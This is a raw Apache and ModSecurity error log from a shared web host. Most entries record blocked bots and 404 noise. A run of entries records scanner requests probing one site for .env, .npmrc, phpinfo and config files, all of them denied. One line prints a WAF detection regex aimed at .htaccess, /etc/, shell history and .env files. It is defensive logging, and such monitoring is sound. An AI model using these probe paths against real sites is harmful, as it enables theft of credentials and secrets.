[Tue May 26 15:09:05.981334 2026] [security2:error] [pid 686593:tid 686712] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/info/php.php"] [unique_id "ahVqOeilgkZcvx0_tl-dawAAu3Y"]
[Tue May 26 15:09:06.524454 2026] [security2:error] [pid 686593:tid 686801] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "nicmaperu.com"] [uri "/index.php"] [unique_id "ahVqN-ilgkZcvx0_tl-dKwAAANM"]
[Tue May 26 15:09:07.128324 2026] [security2:error] [pid 686593:tid 686769] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqOuilgkZcvx0_tl-diQAAALM"]
[Tue May 26 15:09:07.773046 2026] [security2:error] [pid 686593:tid 686627] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/viewinfo.php"] [unique_id "ahVqO-ilgkZcvx0_tl-dsAAAuCE"]
[Tue May 26 15:09:09.273523 2026] [security2:error] [pid 686593:tid 686769] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqPOilgkZcvx0_tl-d0QAAALM"]
[Tue May 26 15:09:10.254571 2026] [security2:error] [pid 686593:tid 686634] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/phpinfo.php"] [unique_id "ahVqPuilgkZcvx0_tl-d9wAA4yg"]
[Tue May 26 15:09:11.999361 2026] [security2:error] [pid 686593:tid 686804] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqP-ilgkZcvx0_tl-eGAAAANY"]
[Tue May 26 15:09:12.001540 2026] [security2:error] [pid 686593:tid 686639] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/local/phpinfo.php"] [unique_id "ahVqQOilgkZcvx0_tl-eHwAAhy0"]
[Tue May 26 15:09:12.840908 2026] [security2:error] [pid 686593:tid 686845] [client 103.240.99.165:55755] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVqQOilgkZcvx0_tl-eJAAAAP8"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:09:13.795328 2026] [security2:error] [pid 686593:tid 686720] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/system/info.php"] [unique_id "ahVqQeilgkZcvx0_tl-eXAAAz34"]
[Tue May 26 15:09:13.800309 2026] [security2:error] [pid 686593:tid 686809] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqQeilgkZcvx0_tl-eQQAAANs"]
[Tue May 26 15:09:15.786506 2026] [security2:error] [pid 686593:tid 686649] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/core/info.php"] [unique_id "ahVqQ-ilgkZcvx0_tl-ergAA9Tc"]
[Tue May 26 15:09:16.301089 2026] [security2:error] [pid 686593:tid 686840] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqQ-ilgkZcvx0_tl-etQAAAPo"]
[Tue May 26 15:09:17.976041 2026] [security2:error] [pid 686593:tid 686666] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/system.php"] [unique_id "ahVqReilgkZcvx0_tl-e3gAAj0g"]
[Tue May 26 15:09:18.410606 2026] [security2:error] [pid 686593:tid 686727] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqReilgkZcvx0_tl-e4QAAAIk"]
[Tue May 26 15:09:18.990487 2026] [core:error] [pid 686593:tid 686762] [client 198.235.24.114:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:09:18.990506 2026] [core:error] [pid 686593:tid 686762] [client 198.235.24.114:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:09:19.827817 2026] [security2:error] [pid 686593:tid 686717] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/p.php"] [unique_id "ahVqR-ilgkZcvx0_tl-fJAAAj3s"]
[Tue May 26 15:09:20.539088 2026] [security2:error] [pid 686593:tid 686812] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqSOilgkZcvx0_tl-fMgAAAN4"]
[Tue May 26 15:09:21.575133 2026] [security2:error] [pid 686593:tid 686681] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/_backup/phpinfo.php"] [unique_id "ahVqSeilgkZcvx0_tl-fXQAA1Vc"]
[Tue May 26 15:09:22.317248 2026] [security2:error] [pid 686593:tid 686797] [client 46.8.22.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqSuilgkZcvx0_tl-fbgAAAM8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:09:22.553975 2026] [security2:error] [pid 686593:tid 686735] [client 114.119.152.167:52309] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVqSuilgkZcvx0_tl-fdwAAAJE"], referer: http://haddingtonwines.com/cart?remove_item=f06ae085fe74cd78ad5e89496b197fe1
[Tue May 26 15:09:23.072783 2026] [security2:error] [pid 686593:tid 686750] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqSuilgkZcvx0_tl-ffwAAAKA"]
[Tue May 26 15:09:23.348972 2026] [security2:error] [pid 686593:tid 686686] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/scripts/phpinfo.php"] [unique_id "ahVqS-ilgkZcvx0_tl-flQAA6Fw"]
[Tue May 26 15:09:24.583931 2026] [security2:error] [pid 686593:tid 686804] [client 46.8.22.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVqTOilgkZcvx0_tl-fqQAAANY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1221328&moderation-hash=60db0a56c75d1a789598e9219cc7ef26
[Tue May 26 15:09:25.039680 2026] [security2:error] [pid 686593:tid 686752] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqTOilgkZcvx0_tl-fsgAAAKI"]
[Tue May 26 15:09:25.062223 2026] [security2:error] [pid 686593:tid 686799] [client 176.65.139.237:25466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVqTeilgkZcvx0_tl-ftgAAANE"]
[Tue May 26 15:09:25.134781 2026] [security2:error] [pid 686593:tid 686692] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/sources/.env"] [unique_id "ahVqTeilgkZcvx0_tl-fvQAA8GI"]
[Tue May 26 15:09:27.008514 2026] [security2:error] [pid 686593:tid 686697] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/enviroments/.env"] [unique_id "ahVqT-ilgkZcvx0_tl-f6wAA0mc"]
[Tue May 26 15:09:27.067918 2026] [security2:error] [pid 686593:tid 686753] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqTuilgkZcvx0_tl-f3wAAAKM"]
[Tue May 26 15:09:27.205574 2026] [security2:error] [pid 686593:tid 686769] [client 159.69.158.189:12172] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVqTuilgkZcvx0_tl-f4wAAALM"], referer: https://thegoodsporting.com
[Tue May 26 15:09:28.652370 2026] [security2:error] [pid 686593:tid 686778] [client 14.185.41.111:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqUOilgkZcvx0_tl-gBwAAALw"]
[Tue May 26 15:09:28.796464 2026] [security2:error] [pid 686593:tid 686726] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqUOilgkZcvx0_tl-gEAAAAIg"]
[Tue May 26 15:09:28.885499 2026] [security2:error] [pid 686593:tid 686603] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env.json"] [unique_id "ahVqUOilgkZcvx0_tl-gGwABAwk"]
[Tue May 26 15:09:30.023676 2026] [security2:error] [pid 686593:tid 686838] [client 46.8.22.136:33293] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVqUeilgkZcvx0_tl-gKAAAAPg"], referer: https://anujtradingco.com
[Tue May 26 15:09:30.695022 2026] [security2:error] [pid 686593:tid 686610] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.npmrc"] [unique_id "ahVqUuilgkZcvx0_tl-gSwAA4BA"]
[Tue May 26 15:09:31.348584 2026] [security2:error] [pid 686593:tid 686821] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqUuilgkZcvx0_tl-gVAAAAOc"]
[Tue May 26 15:09:32.329440 2026] [security2:error] [pid 686593:tid 686797] [client 185.191.171.13:28788] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/list/"] [unique_id "ahVqVOilgkZcvx0_tl-gfQAAAM8"]
[Tue May 26 15:09:32.329562 2026] [security2:error] [pid 686593:tid 686797] [client 185.191.171.13:28788] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/list/"] [unique_id "ahVqVOilgkZcvx0_tl-gfQAAAM8"]
[Tue May 26 15:09:32.474742 2026] [security2:error] [pid 686593:tid 686614] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/src/config.js"] [unique_id "ahVqVOilgkZcvx0_tl-ggQAAjRQ"]
[Tue May 26 15:09:32.992451 2026] [security2:error] [pid 686593:tid 686750] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqVOilgkZcvx0_tl-giAAAAKA"]
[Tue May 26 15:09:34.151856 2026] [core:crit] [pid 686593:tid 686767] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:09:34.288148 2026] [security2:error] [pid 686593:tid 686707] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/src/config.php"] [unique_id "ahVqVuilgkZcvx0_tl-gyQAA-XE"]
[Tue May 26 15:09:34.910801 2026] [core:crit] [pid 686593:tid 686802] (13)Permission denied: [client 157.55.39.58:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:09:35.154287 2026] [security2:error] [pid 686593:tid 686748] [client 193.37.33.150:22387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVqVuilgkZcvx0_tl-g6wAAAJ4"]
[Tue May 26 15:09:35.248132 2026] [security2:error] [pid 686593:tid 686794] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqVuilgkZcvx0_tl-g3wAAAMw"]
[Tue May 26 15:09:36.158880 2026] [security2:error] [pid 686593:tid 686705] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config.yml"] [unique_id "ahVqWOilgkZcvx0_tl-hDgAA4m8"]
[Tue May 26 15:09:37.580021 2026] [security2:error] [pid 686593:tid 686827] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqWeilgkZcvx0_tl-hMAAAAO0"]
[Tue May 26 15:09:38.029065 2026] [security2:error] [pid 686593:tid 686629] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config.py"] [unique_id "ahVqWuilgkZcvx0_tl-hRwABAiM"]
[Tue May 26 15:09:39.774810 2026] [security2:error] [pid 686593:tid 686633] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/config/environment.php"] [unique_id "ahVqW-ilgkZcvx0_tl-hkwAA0yc"]
[Tue May 26 15:09:40.315334 2026] [security2:error] [pid 686593:tid 686793] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqW-ilgkZcvx0_tl-hmQAAAMs"]
[Tue May 26 15:09:40.696258 2026] [core:crit] [pid 686593:tid 686756] (13)Permission denied: [client 52.167.144.211:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:09:41.567678 2026] [security2:error] [pid 686593:tid 686657] [remote 178.128.111.105:51756] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/backend/mail.php"] [unique_id "ahVqXeilgkZcvx0_tl-h3AAA9T8"]
[Tue May 26 15:09:42.178129 2026] [security2:error] [pid 686593:tid 686845] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqXeilgkZcvx0_tl-h5AAAAP8"]
[Tue May 26 15:09:43.877121 2026] [core:crit] [pid 686593:tid 686724] (13)Permission denied: [client 40.77.167.143:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:09:44.383095 2026] [security2:error] [pid 686593:tid 686804] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqX-ilgkZcvx0_tl-iKwAAANY"]
[Tue May 26 15:09:46.051003 2026] [security2:error] [pid 686593:tid 686756] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqYeilgkZcvx0_tl-iWQAAAKY"]
[Tue May 26 15:09:48.791544 2026] [security2:error] [pid 686593:tid 686850] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqZOilgkZcvx0_tl-ivgAAAQQ"]
[Tue May 26 15:09:49.328970 2026] [autoindex:error] [pid 686593:tid 686801] [client 147.185.132.126:60090] AH01276: Cannot serve directory /home2/svijakqj/planooptics.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:09:50.576666 2026] [security2:error] [pid 686593:tid 686787] [client 74.7.230.35:39354] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "traderscafe.in.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVqZuilgkZcvx0_tl-jAQAAxWQ"]
[Tue May 26 15:09:50.620102 2026] [security2:error] [pid 686593:tid 686816] [client 74.7.244.16:47330] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "traderscafe.club.jiyani.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVqZuilgkZcvx0_tl-jAgAA4mU"]
[Tue May 26 15:09:50.763541 2026] [security2:error] [pid 686593:tid 686789] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVqZuilgkZcvx0_tl-i9wAAAMc"]
[Tue May 26 15:09:51.045140 2026] [autoindex:error] [pid 686593:tid 686696] [remote 74.7.227.128:43762] AH01276: Cannot serve directory /home2/tips4iow/traderscafe.club/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:09:51.182098 2026] [security2:error] [pid 686593:tid 686829] [client 114.119.131.185:27675] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/2022/12/05/why-fear-will-cripple-your-career/"] [unique_id "ahVqZ-ilgkZcvx0_tl-jFQAAAO8"], referer: https://we-fight-one-by-one.com/showthread.php?tid=4248&pid=165834
[Tue May 26 15:09:51.677065 2026] [security2:error] [pid 686593:tid 686785] [client 127.0.0.1:16538] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVqZ-ilgkZcvx0_tl-jKQAAAMM"]
[Tue May 26 15:09:51.677095 2026] [security2:error] [pid 686593:tid 686798] [client 127.0.0.1:16536] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.afstpaul.org"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVqZ-ilgkZcvx0_tl-jKAAAANA"]
[Tue May 26 15:09:51.677228 2026] [security2:error] [pid 686593:tid 686826] [client 74.7.230.31:46642] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "autodiscover.afstpaul.org"] [uri "/robots.txt"] [unique_id "ahVqZ-ilgkZcvx0_tl-jJwAA7Go"]
